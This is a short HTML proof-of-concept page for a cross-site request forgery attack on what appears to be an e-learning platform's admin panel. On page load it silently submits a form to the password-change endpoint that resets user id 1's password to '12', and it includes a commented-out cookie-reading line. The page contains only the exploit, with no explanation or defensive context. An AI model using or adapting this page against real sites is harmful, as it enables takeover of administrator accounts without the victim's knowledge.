<body onload='document.forms[0].submit()'>
<form method="POST" action="http://localhost:1180/modules/admin/password.php?submit=yes&changePass=do&userid=1">


<input class='FormData_InputText' type="password" size="40" name="password_form" value="12"></td>
   </tr>
   <tr>
     <th width="150" class='left'>$langNewPass2</th>
     <td><input class='FormData_InputText' type="password" size="40" name="password_form1" value="12"></td>
    </tr>
  <tr>
<td><input type="Submit" id="boom" value="$langModify"></td>

<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();

        // alert(document.cookie);

      }
</script>
